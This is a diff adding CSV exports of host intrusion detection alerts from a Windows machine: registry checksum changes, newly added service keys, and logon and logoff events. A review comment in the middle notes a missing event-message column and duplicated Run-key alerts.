+Old md5sum was: '11a0a0f0fc8f56d3bbc9abddc96e927d' +New md5sum is : '0447d0d52ee5a830c05fbee07043f258' +Old sha1sum was: '1645f3059a0e2400f891ff8183bd5aa72ced616f' +New sha1sum is : 'c52421ca8edc9b41a95e22c437b67f0f199f288a' +" +"Apr 6, 2020 @ 10:13:28.882",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c07851f8f2e30eb65757347b948170ba' +New md5sum is : '0c2db3419a15dba7e52bd9e1bed61e50' +Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +New sha1sum is : 'beb5a77c657190ccf5e14d9c81f4201b9c95f292' +" +"Apr 6, 2020 @ 10:13:28.870",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : '569a53da113e27941126d6f916d48ef7' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : '1b2f772dfe95412bcd506ff44a8678ddcce28603' +" +"Apr 6, 2020 @ 10:13:10.595",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 10:13:06.642",3,"Windows Logon Success", +"Apr 6, 2020 @ 10:12:27.431",3,"Service startup type was changed", +"Apr 6, 2020 @ 10:11:39.711",3,"Service startup type was changed", +"Apr 6, 2020 @ 10:11:12.466",3,"Windows Logon Success", +"Apr 6, 2020 @ 10:11:06.736",8,"Windows Audit Policy changed", +"Apr 6, 2020 @ 10:11:06.655",8,"Windows Audit Policy changed", +"Apr 6, 2020 @ 10:10:46.481",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: 'a249eaefa5ff78b07f237101e264cc9d' +New md5sum is : 'f65ebed619edcfc8fafe21f958215b53' +Old sha1sum was: 'dc3537617a451d2bba559b268af415371f61047d' +New sha1sum is : '493297f96d762981a98fbe5f8c5b5782c30b65aa' +" +"Apr 6, 2020 @ 10:10:46.450",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'ef61c89521b08e3e01139cb68760b8ef' +New md5sum is : '619d435b1dac461a9b0cfd3b48ee8f37' +Old sha1sum was: 'ba75d185787a2442cd9799e96a555ee047e599ce' +New sha1sum is : '95d0826303f42e23fada9a211bd9ea71de2d5c51' +" +"Apr 6, 2020 @ 10:10:46.074",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\Config' checksum changed. +Old md5sum was: '0ebb8711c350212cd2f8c61fc7e2b3cc' +New md5sum is : '4087f5fe742b775fd1c87a55df2c17b1' +Old sha1sum was: 'bfc74fd3e8adb19c38a350b17d56a7813f34acf3' +New sha1sum is : '1297094bac9227c7e50f5aadd1eabc06de017a59' +" +"Apr 6, 2020 @ 10:10:45.793",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\SPP' checksum changed. +Old md5sum was: 'ddbcd3e6531389ab2a41485d4e269c18' +New md5sum is : '2ea51d1ba636ce79794c0e7641fb2a5d' +Old sha1sum was: 'a15f79d86ecf9805b68f9a6da9514885c77bb920' +New sha1sum is : '030126defae599c842ea0f6222bf176d2ee7d204' +" +"Apr 6, 2020 @ 10:10:41.528",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 10:10:37.871",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. 
+Old md5sum was: '7d1025136862155d96851d39ac74df09' +New md5sum is : 'bb30a4865d0fe96a2d7b53b843e8fa0a' +Old sha1sum was: '1f5532bbeac9873325c8276bc3963a96cd381d39' +New sha1sum is : '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +" +"Apr 6, 2020 @ 10:10:32.964",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SmsRouter\State\Registration\Map' checksum changed. +Old md5sum was: '457f457ade91790013e3be0cde87ce24' +New md5sum is : 'f725bdba3c624ef1211452f438569838' +Old sha1sum was: '5fbf4fcfcb8efc07a4d5b6abbd9601e5a4beb674' +New sha1sum is : '76d6ea0f40d643341bc4517a2d1b043f15ea0c6b' +" +"Apr 6, 2020 @ 10:10:32.231",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '8c0751118d2ac93a9b9a23ce681da6b9' +New md5sum is : 'b797adbb031d5549972eab8f4fefce92' +Old sha1sum was: '92028e2b4009cdd6e7ec37ac2c9bca2c9d23cfb5' +New sha1sum is : '2710d121cefbac3bfe70dd3a02961d89b19ce275' +" +"Apr 6, 2020 @ 10:10:31.761",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '0feea5d01af86c53a7dc7b1788f7ff87' +New md5sum is : '42b1cfaecd6812f4699ee8e12aa6d8a6' +Old sha1sum was: '1f0ec39f411a103a61ef2d1ffbc5928625c3ec4f' +New sha1sum is : '4bb75f2982bff625b8cb8426313f4a7ef461e8b0' +" +"Apr 6, 2020 @ 10:10:31.700",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '1f5b957847a3a8475b0418a13f466005' +New md5sum is : '11a0a0f0fc8f56d3bbc9abddc96e927d' +Old sha1sum was: 'eb711b8f09d9f29a474a89e4fb99c65db47147ce' +New sha1sum is : '1645f3059a0e2400f891ff8183bd5aa72ced616f' +" +"Apr 6, 2020 @ 10:10:03.338",3,"Software Protection service scheduled successfully", 
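Review bot: The header of this file, `timestamp,"rule.level","rule.description","full_log"`, lacks the `data.win.system.message` column that `data/MW_20_HIDS_2.csv` carries, so every Windows-eventlog row here (`Windows Logon Success`, `Windows Audit Policy changed`, `Service startup type was changed`, the level-9 `AutoAdminLogon` benchmark failure) has an empty `full_log` and no event detail at all. The row most relevant to persistence, the checksum change on `HKEY_USERS\S-1-5-21-…-1001\Software\Microsoft\Windows\CurrentVersion\Run` at 10:14:45, likewise records only old and new hashes, not the value that was written, so the file cannot show what was added under the Run key. If the column cannot be re-exported, the dataset README should state that the HIDS_1 exports omit the Windows event message. That Run-key change also appears twice with identical checksums, once with the `[x64]` prefix and once without, which looks like the same change reported for both registry views; note whether such pairs count as one alert or two.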
diff --git a/data/MW_20_HIDS_2.csv b/data/MW_20_HIDS_2.csv new file mode 100644 index 0000000..1aaf2e1 --- /dev/null +++ b/data/MW_20_HIDS_2.csv 
@@ -0,0 +1,1256 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 26, 2020 @ 10:57:36.039",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:57:36.009",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:57:33.258",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'ed88c4f4720f9ee85957abb94f304681' +New md5sum is : 'bab7f7a65fdaacd4e6b8b6a5061897a9' +Old sha1sum was: 'dfbfadf824ea326343b7e38b3f7914f74c482b0b' +New sha1sum is : '996a854fff250b5a422ab1cf6a5fe4cf3919d15c' +", +"Apr 26, 2020 @ 10:57:31.492",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '13dc259f379d87b2e5309e0615660fbd' +New md5sum is : '5aa8e4546390bfdbf65b75d3999f7d27' +Old sha1sum was: '7b7640c8ae985ec313fc158f04c94160aed9ba62' +New sha1sum is : 'dfad5825e83ffedce47f82287e54c327bee0a9d2' +", +"Apr 26, 2020 @ 10:57:30.554",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: '9a0e6860ed855c30f134fc56d8ebf295' +New md5sum is : 'b66ff1de44cede493d2d5ec9a100c22f' +Old sha1sum was: 'ed3b06cd890e72527d6a9facc45f47e75ca198c0' +New sha1sum is : '4f8301d8c419c2a62d84573ce68890a97ccf936f' +", +"Apr 26, 2020 @ 10:57:30.445",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f520' was added. +", +"Apr 26, 2020 @ 10:57:30.429",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f520\TriggerInfo\0' was added. 
+", +"Apr 26, 2020 @ 10:57:30.414",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:57:26.258",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: '4f6d055ae9421c6eaaea00278d045ee8' +New md5sum is : 'd3b8b23090d51db3cfe1e9ecd4bf3f60' +Old sha1sum was: '075a70943680f9d5268ab1301ec05918e7969062' +New sha1sum is : 'abb19fb282dc8a8540e74484ab4bef9e1719d561' +", +"Apr 26, 2020 @ 10:57:22.594",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: 'ed88c4f4720f9ee85957abb94f304681' +New md5sum is : 'bab7f7a65fdaacd4e6b8b6a5061897a9' +Old sha1sum was: 'dfbfadf824ea326343b7e38b3f7914f74c482b0b' +New sha1sum is : '996a854fff250b5a422ab1cf6a5fe4cf3919d15c' +", +"Apr 26, 2020 @ 10:57:19.882",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'd49b1e0e5d54f0f3afc8611036d44088' +New md5sum is : 'd6c66f3cfcf282def437343895ab3fa8' +Old sha1sum was: '67d1db6f9eb60c510bc959d4fed11edd37751205' +New sha1sum is : '1f15b20143ed74043de3a339b473192ac5b48b15' +", +"Apr 26, 2020 @ 10:57:19.226",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: 'ed88c4f4720f9ee85957abb94f304681' +New md5sum is : 'bab7f7a65fdaacd4e6b8b6a5061897a9' +Old sha1sum was: 'dfbfadf824ea326343b7e38b3f7914f74c482b0b' +New sha1sum is : '996a854fff250b5a422ab1cf6a5fe4cf3919d15c' +", +"Apr 26, 2020 @ 10:57:18.180",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. 
+Old md5sum was: '1c6e2319780c0264f929f3c3433add82' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'f924403989ef2de336c156640b73fb0db5024306' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +", +"Apr 26, 2020 @ 10:57:11.835",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. 
+ +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:57:10.385",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'd4404ea1723d6a64ecf59184c42b56dc' +New md5sum is : 'a9e4daddf64ff555409ab89ed9ce7103' +Old sha1sum was: '0e7668ac8b3a3f95ef8df9750dbd0575ba6ee519' +New sha1sum is : '6efb884e36f6ba353d970450648c378dd9714ff0' +", +"Apr 26, 2020 @ 10:57:03.869",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '2e66bbab6f7f051484904d50bd64c4bd' +New md5sum is : 'ad50f93c84bcc3869d570b2c5f7ec070' +Old sha1sum was: 'd443c4cc88c9009ec68ded5a89a3fda13ac3b6da' +New sha1sum is : 'c401f6fc16c7391a3e6572edd86614ad54bbe351' +", +"Apr 26, 2020 @ 10:57:00.460",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:57:00.445",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:57:00.366",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3f520' was added. 
+", +"Apr 26, 2020 @ 10:57:00.351",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:57:00.100",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:57:00.085",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:59.459",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:56:59.428",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:59.303",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:56:59.288",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:59.133",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'd3fc2e40ff1cbd8f3e440cadb414e8a1' +New md5sum is : '841a277fefa4126bc37553936b32cbf8' +Old sha1sum was: 'da09e52cc3e283503fcbc0fc9d976d29b6f64ab9' +New sha1sum is : '4e2a2966c8b1ce70115bdc87ad62f91c16aecfc0' +", +"Apr 26, 2020 @ 10:56:57.600",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:56:57.585",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3f520\Security' was added. 
+", +"Apr 26, 2020 @ 10:56:57.429",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3f520' was added. +", +"Apr 26, 2020 @ 10:56:57.413",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:57.350",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3f520' was added. +", +"Apr 26, 2020 @ 10:56:57.335",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:55.147",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f520' was added. +", +"Apr 26, 2020 @ 10:56:55.131",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f520\TriggerInfo\4' was added. +", +"Apr 26, 2020 @ 10:56:55.116",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f520\TriggerInfo\3' was added. +", +"Apr 26, 2020 @ 10:56:55.100",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f520\TriggerInfo\2' was added. +", +"Apr 26, 2020 @ 10:56:55.085",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f520\TriggerInfo\1' was added. +", +"Apr 26, 2020 @ 10:56:55.069",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f520\TriggerInfo\0' was added. +", +"Apr 26, 2020 @ 10:56:55.053",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3f520\Security' was added. 
+", +"Apr 26, 2020 @ 10:56:54.053",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3f520' was added. +", +"Apr 26, 2020 @ 10:56:54.038",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3f520\Security' was added. +", +"Apr 26, 2020 @ 10:56:53.808",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '57aab89963db21e021a8fb1def63e397' +New md5sum is : '37d80812ee416845758ac804badeea03' +Old sha1sum was: 'bafc4639617773aa8d06267b01d92467e7e9a1ea' +New sha1sum is : 'acb2534bec4dd00a385b3595b4129ca958624cff' +", +"Apr 26, 2020 @ 10:56:53.796",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '8e6e7974f2d8d3f529f902963e640b87' +New md5sum is : '3e4c738303b2bc7a6fd400bee372c137' +Old sha1sum was: '1b06a841f422b9af803da06e6e4f665d140f2d60' +New sha1sum is : '5de39ea5fb68698262cdbbe2359bcf0acb55c1d2' +", +"Apr 26, 2020 @ 10:56:53.755",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'a5d862c45086d7eb3ecd2008e6e0bf2c' +New md5sum is : '2e26d4cdb348cde76532b1256a8c5a2b' +Old sha1sum was: '7afcf8aea7a5cd7d080891bbbf5c23efc775d31d' +New sha1sum is : 'f11f5b869f02bbb74575cec94ad5149d473309bb' +", +"Apr 26, 2020 @ 10:56:51.319",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3f520' was added. +", +"Apr 26, 2020 @ 10:56:51.288",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3f520\Security' was added. 
+", +"Apr 26, 2020 @ 10:56:44.928",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 26, 2020 @ 10:56:26.912",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-27T10:55:25Z. Reason: RulesEngine.""" +"Apr 26, 2020 @ 10:56:18.962",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:57.427",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. 
+ +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:45.676",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xBB6B1 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 26, 2020 @ 10:55:45.615",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xBB6DA + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.""" +"Apr 26, 2020 @ 10:55:45.334",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xBB6DA + Linked Logon ID: 0xBB6B1 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x160 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. 
+ +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:45.301",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xBB6B1 + Linked Logon ID: 0xBB6DA + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x160 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). 
+ +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:36.572",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: 